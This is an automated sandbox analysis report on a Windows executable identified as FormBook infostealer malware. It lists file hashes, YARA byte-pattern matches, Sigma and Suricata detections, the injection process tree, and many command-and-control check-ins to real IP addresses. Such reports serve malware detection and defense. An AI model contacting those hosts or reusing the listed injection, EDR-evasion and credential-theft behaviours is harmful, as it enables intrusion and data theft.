Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
P030092024LANDWAY.exe

Overview

General Information

Sample name:P030092024LANDWAY.exe
Analysis ID:1522543
MD5:3ffb03ef28aff93d8cd6b83911d700ee
SHA1:4322b8a74fed0809dca565feff13bae1c60196d4
SHA256:0efac5788be9dbd7b74affa2c8f6c14a2b6cce84d981d0b088566e50eefc72e4
Tags:exeuser-lowmal3
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
Yara detected Powershell download and execute
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • P030092024LANDWAY.exe (PID: 504 cmdline: "C:\Users\user\Desktop\P030092024LANDWAY.exe" MD5: 3FFB03EF28AFF93D8CD6B83911D700EE)
    • svchost.exe (PID: 2644 cmdline: "C:\Users\user\Desktop\P030092024LANDWAY.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • BpYpWzndkWcpUJ.exe (PID: 3880 cmdline: "C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • cmdl32.exe (PID: 612 cmdline: "C:\Windows\SysWOW64\cmdl32.exe" MD5: BD60DF43E6419AFE39B3FCBFB14077E7)
          • BpYpWzndkWcpUJ.exe (PID: 2360 cmdline: "C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 5940 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.4607447719.0000000004390000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000007.00000002.4607447719.0000000004390000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2bb30:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x13e3f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    00000007.00000002.4601006120.0000000002700000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000007.00000002.4601006120.0000000002700000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2bb30:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x13e3f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000002.00000002.2490110495.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 13 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        2.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          2.2.svchost.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2e223:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x16532:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          2.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            2.2.svchost.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2f023:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x17332:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Uncommon Svchost Parent Process
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\P030092024LANDWAY.exe", CommandLine: "C:\Users\user\Desktop\P030092024LANDWAY.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\P030092024LANDWAY.exe", ParentImage: C:\Users\user\Desktop\P030092024LANDWAY.exe, ParentProcessId: 504, ParentProcessName: P030092024LANDWAY.exe, ProcessCommandLine: "C:\Users\user\Desktop\P030092024LANDWAY.exe", ProcessId: 2644, ProcessName: svchost.exe
            Sigma detected: Windows Processes Suspicious Parent Directory
            Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\P030092024LANDWAY.exe", CommandLine: "C:\Users\user\Desktop\P030092024LANDWAY.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\P030092024LANDWAY.exe", ParentImage: C:\Users\user\Desktop\P030092024LANDWAY.exe, ParentProcessId: 504, ParentProcessName: P030092024LANDWAY.exe, ProcessCommandLine: "C:\Users\user\Desktop\P030092024LANDWAY.exe", ProcessId: 2644, ProcessName: svchost.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-30T10:41:53.699517+020020507451Malware Command and Control Activity Detected192.168.2.658772172.191.244.6280TCP
            2024-09-30T10:42:17.405251+020020507451Malware Command and Control Activity Detected192.168.2.6587773.33.130.19080TCP
            2024-09-30T10:42:30.704831+020020507451Malware Command and Control Activity Detected192.168.2.658782203.161.41.20580TCP
            2024-09-30T10:42:44.317064+020020507451Malware Command and Control Activity Detected192.168.2.65878665.21.196.9080TCP
            2024-09-30T10:43:18.987590+020020507451Malware Command and Control Activity Detected192.168.2.658790172.217.31.480TCP
            2024-09-30T10:43:33.190837+020020507451Malware Command and Control Activity Detected192.168.2.658795121.254.178.23980TCP
            2024-09-30T10:43:47.100316+020020507451Malware Command and Control Activity Detected192.168.2.658799202.87.223.24880TCP
            2024-09-30T10:44:00.690889+020020507451Malware Command and Control Activity Detected192.168.2.658803217.160.0.15880TCP
            2024-09-30T10:44:14.326953+020020507451Malware Command and Control Activity Detected192.168.2.65880885.159.66.9380TCP
            2024-09-30T10:44:29.165976+020020507451Malware Command and Control Activity Detected192.168.2.658812221.128.225.5780TCP
            2024-09-30T10:44:42.426991+020020507451Malware Command and Control Activity Detected192.168.2.6588163.33.130.19080TCP
            2024-09-30T10:44:56.893284+020020507451Malware Command and Control Activity Detected192.168.2.658820103.21.221.8780TCP
            2024-09-30T10:45:10.616296+020020507451Malware Command and Control Activity Detected192.168.2.6588243.33.130.19080TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-30T10:41:53.699517+020028554651A Network Trojan was detected192.168.2.658772172.191.244.6280TCP
            2024-09-30T10:42:17.405251+020028554651A Network Trojan was detected192.168.2.6587773.33.130.19080TCP
            2024-09-30T10:42:30.704831+020028554651A Network Trojan was detected192.168.2.658782203.161.41.20580TCP
            2024-09-30T10:42:44.317064+020028554651A Network Trojan was detected192.168.2.65878665.21.196.9080TCP
            2024-09-30T10:43:18.987590+020028554651A Network Trojan was detected192.168.2.658790172.217.31.480TCP
            2024-09-30T10:43:33.190837+020028554651A Network Trojan was detected192.168.2.658795121.254.178.23980TCP
            2024-09-30T10:43:47.100316+020028554651A Network Trojan was detected192.168.2.658799202.87.223.24880TCP
            2024-09-30T10:44:00.690889+020028554651A Network Trojan was detected192.168.2.658803217.160.0.15880TCP
            2024-09-30T10:44:14.326953+020028554651A Network Trojan was detected192.168.2.65880885.159.66.9380TCP
            2024-09-30T10:44:29.165976+020028554651A Network Trojan was detected192.168.2.658812221.128.225.5780TCP
            2024-09-30T10:44:42.426991+020028554651A Network Trojan was detected192.168.2.6588163.33.130.19080TCP
            2024-09-30T10:44:56.893284+020028554651A Network Trojan was detected192.168.2.658820103.21.221.8780TCP
            2024-09-30T10:45:10.616296+020028554651A Network Trojan was detected192.168.2.6588243.33.130.19080TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-09-30T10:42:09.262936+020028554641A Network Trojan was detected192.168.2.6587743.33.130.19080TCP
            2024-09-30T10:42:12.706791+020028554641A Network Trojan was detected192.168.2.6587753.33.130.19080TCP
            2024-09-30T10:42:15.905944+020028554641A Network Trojan was detected192.168.2.6587763.33.130.19080TCP
            2024-09-30T10:42:23.054600+020028554641A Network Trojan was detected192.168.2.658779203.161.41.20580TCP
            2024-09-30T10:42:25.636332+020028554641A Network Trojan was detected192.168.2.658780203.161.41.20580TCP
            2024-09-30T10:42:28.158563+020028554641A Network Trojan was detected192.168.2.658781203.161.41.20580TCP
            2024-09-30T10:42:36.838707+020028554641A Network Trojan was detected192.168.2.65878365.21.196.9080TCP
            2024-09-30T10:42:39.054222+020028554641A Network Trojan was detected192.168.2.65878465.21.196.9080TCP
            2024-09-30T10:42:41.574327+020028554641A Network Trojan was detected192.168.2.65878565.21.196.9080TCP
            2024-09-30T10:42:51.233804+020028554641A Network Trojan was detected192.168.2.658787172.217.31.480TCP
            2024-09-30T10:42:53.969026+020028554641A Network Trojan was detected192.168.2.658788172.217.31.480TCP
            2024-09-30T10:42:56.561911+020028554641A Network Trojan was detected192.168.2.658789172.217.31.480TCP
            2024-09-30T10:43:25.502520+020028554641A Network Trojan was detected192.168.2.658792121.254.178.23980TCP
            2024-09-30T10:43:28.046526+020028554641A Network Trojan was detected192.168.2.658793121.254.178.23980TCP
            2024-09-30T10:43:30.623195+020028554641A Network Trojan was detected192.168.2.658794121.254.178.23980TCP
            2024-09-30T10:43:39.463796+020028554641A Network Trojan was detected192.168.2.658796202.87.223.24880TCP
            2024-09-30T10:43:42.028573+020028554641A Network Trojan was detected192.168.2.658797202.87.223.24880TCP
            2024-09-30T10:43:44.550716+020028554641A Network Trojan was detected192.168.2.658798202.87.223.24880TCP
            2024-09-30T10:43:52.818376+020028554641A Network Trojan was detected192.168.2.658800217.160.0.15880TCP
            2024-09-30T10:43:55.482322+020028554641A Network Trojan was detected192.168.2.658801217.160.0.15880TCP
            2024-09-30T10:43:58.163807+020028554641A Network Trojan was detected192.168.2.658802217.160.0.15880TCP
            2024-09-30T10:44:07.453345+020028554641A Network Trojan was detected192.168.2.65880485.159.66.9380TCP
            2024-09-30T10:44:09.999474+020028554641A Network Trojan was detected192.168.2.65880585.159.66.9380TCP
            2024-09-30T10:44:12.546215+020028554641A Network Trojan was detected192.168.2.65880785.159.66.9380TCP
            2024-09-30T10:44:21.422412+020028554641A Network Trojan was detected192.168.2.658809221.128.225.5780TCP
            2024-09-30T10:44:23.978913+020028554641A Network Trojan was detected192.168.2.658810221.128.225.5780TCP
            2024-09-30T10:44:26.510536+020028554641A Network Trojan was detected192.168.2.658811221.128.225.5780TCP
            2024-09-30T10:44:34.671598+020028554641A Network Trojan was detected192.168.2.6588133.33.130.19080TCP
            2024-09-30T10:44:37.239990+020028554641A Network Trojan was detected192.168.2.6588143.33.130.19080TCP
            2024-09-30T10:44:39.809936+020028554641A Network Trojan was detected192.168.2.6588153.33.130.19080TCP
            2024-09-30T10:44:48.971087+020028554641A Network Trojan was detected192.168.2.658817103.21.221.8780TCP
            2024-09-30T10:44:51.685006+020028554641A Network Trojan was detected192.168.2.658818103.21.221.8780TCP
            2024-09-30T10:44:54.369051+020028554641A Network Trojan was detected192.168.2.658819103.21.221.8780TCP
            2024-09-30T10:45:02.455818+020028554641A Network Trojan was detected192.168.2.6588213.33.130.19080TCP
            2024-09-30T10:45:04.994400+020028554641A Network Trojan was detected192.168.2.6588223.33.130.19080TCP
            2024-09-30T10:45:08.487032+020028554641A Network Trojan was detected192.168.2.6588233.33.130.19080TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Multi AV Scanner detection for submitted file
            Source: P030092024LANDWAY.exeVirustotal: Detection: 29%Perma Link
            Source: P030092024LANDWAY.exeReversingLabs: Detection: 28%
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000007.00000002.4607447719.0000000004390000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.4601006120.0000000002700000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2490110495.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000009.00000002.4615262258.0000000004FE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000007.00000002.4607493731.00000000043E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2490404143.00000000036D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2490732438.0000000003E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4606443836.0000000002510000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Machine Learning detection for sample
            Source: P030092024LANDWAY.exeJoe Sandbox ML: detected
            Source: P030092024LANDWAY.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: BpYpWzndkWcpUJ.exe, 00000006.00000000.2409444434.000000000084E000.00000002.00000001.01000000.00000005.sdmp, BpYpWzndkWcpUJ.exe, 00000009.00000002.4601455514.000000000084E000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: cmdl32.pdbGCTL source: svchost.exe, 00000002.00000003.2458453909.000000000321B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2458586520.0000000003225000.00000004.00000020.00020000.00000000.sdmp, BpYpWzndkWcpUJ.exe, 00000006.00000003.2684404300.000000000073B000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdbUGP source: P030092024LANDWAY.exe, 00000000.00000003.2198844457.00000000044B0000.00000004.00001000.00020000.00000000.sdmp, P030092024LANDWAY.exe, 00000000.00000003.2198176804.0000000004600000.00000004.00001000.00020000.00000000.sdmp, P030092024LANDWAY.exe, 00000000.00000003.2198040215.0000000004460000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2389839725.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2490432116.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2388201917.0000000003400000.00000004.00000020.00020000.00000000.sdmp, cmdl32.exe, 00000007.00000002.4610295859.0000000004A2E000.00000040.00001000.00020000.00000000.sdmp, cmdl32.exe, 00000007.00000002.4610295859.0000000004890000.00000040.00001000.00020000.00000000.sdmp, cmdl32.exe, 00000007.00000003.2491626211.0000000004520000.00000004.00000020.00020000.00000000.sdmp, cmdl32.exe, 00000007.00000003.2493657700.00000000046DE000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: cmdl32.pdb source: svchost.exe, 00000002.00000003.2458453909.000000000321B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2458586520.0000000003225000.00000004.00000020.00020000.00000000.sdmp, BpYpWzndkWcpUJ.exe, 00000006.00000003.2684404300.000000000073B000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: P030092024LANDWAY.exe, 00000000.00000003.2198844457.00000000044B0000.00000004.00001000.00020000.00000000.sdmp, P030092024LANDWAY.exe, 00000000.00000003.2198176804.0000000004600000.00000004.00001000.00020000.00000000.sdmp, P030092024LANDWAY.exe, 00000000.00000003.2198040215.0000000004460000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2490432116.0000000003800000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2389839725.0000000003600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2490432116.000000000399E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2388201917.0000000003400000.00000004.00000020.00020000.00000000.sdmp, cmdl32.exe, cmdl32.exe, 00000007.00000002.4610295859.0000000004A2E000.00000040.00001000.00020000.00000000.sdmp, cmdl32.exe, 00000007.00000002.4610295859.0000000004890000.00000040.00001000.00020000.00000000.sdmp, cmdl32.exe, 00000007.00000003.2491626211.0000000004520000.00000004.00000020.00020000.00000000.sdmp, cmdl32.exe, 00000007.00000003.2493657700.00000000046DE000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: cmdl32.exe, 00000007.00000002.4614735338.0000000004EBC000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 00000007.00000002.4603396421.0000000002887000.00000004.00000020.00020000.00000000.sdmp, BpYpWzndkWcpUJ.exe, 00000009.00000000.2558210315.0000000002BAC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2779864917.00000000271DC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: cmdl32.exe, 00000007.00000002.4614735338.0000000004EBC000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 00000007.00000002.4603396421.0000000002887000.00000004.00000020.00020000.00000000.sdmp, BpYpWzndkWcpUJ.exe, 00000009.00000000.2558210315.0000000002BAC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2779864917.00000000271DC000.00000004.80000000.00040000.00000000.sdmp
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 7_2_0271C1A0 FindFirstFileW,FindNextFileW,FindClose,7_2_0271C1A0
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 4x nop then xor eax, eax7_2_02709BF0
            Source: C:\Windows\SysWOW64\cmdl32.exeCode function: 4x nop then mov ebx, 00000004h7_2_045204E8
            Source: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exeCode function: 4x nop then pop edi9_2_05035E34
            Source: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exeCode function: 4x nop then mov esp, ebp9_2_050336E6
            Source: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exeCode function: 4x nop then pop edi9_2_05034B6C
            Source: C:\Program Files (x86)\nglcwEbNvEhSMeICtmDrzMTVyrxIRFcQJfSdydfvOZvxGXnUPcePsKx\BpYpWzndkWcpUJ.exeCode function: 4x nop then xor eax, eax9_2_050393A6

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:58824 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:58824 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:58789 -> 172.217.31.4:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:58798 -> 202.87.223.248:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:58780 -> 203.161.41.205:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:58772 -> 172.191.244.62:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:58772 -> 172.191.244.62:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:58785 -> 65.21.196.90:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:58776 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:58795 -> 121.254.178.239:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:58795 -> 121.254.178.239:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:58802 -> 217.160.0.158:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:58801 -> 217.160.0.158:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:58788 -> 172.217.31.4:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:58822 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:58796 -> 202.87.223.248:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:58808 -> 85.159.66.93:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:58808 -> 85.159.66.93:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:58794 -> 121.254.178.239:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:58783 -> 65.21.196.90:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:58793 -> 121.254.178.239:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:58777 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:58777 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:58805 -> 85.159.66.93:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:58809 -> 221.128.225.57:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:58774 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:58818 -> 103.21.221.87:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:58775 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:58813 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:58782 -> 203.161.41.205:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:58782 -> 203.161.41.205:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:58792 -> 121.254.178.239:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:58787 -> 172.217.31.4:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:58817 -> 103.21.221.87:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:58821 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:58807 -> 85.159.66.93:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:58823 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:58816 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:58816 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:58799 -> 202.87.223.248:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:58799 -> 202.87.223.248:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:58790 -> 172.217.31.4:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:58790 -> 172.217.31.4:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:58810 -> 221.128.225.57:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.6:58820 -> 103.21.221.87:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.6:58820 -> 103.21.221.87:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:58784 -> 65.21.196.90:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:58779 -> 203.161.41.205:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:58814 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:58819 -> 103.21.221.87:80
            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.6:58804 -> 85.159.66.93:80
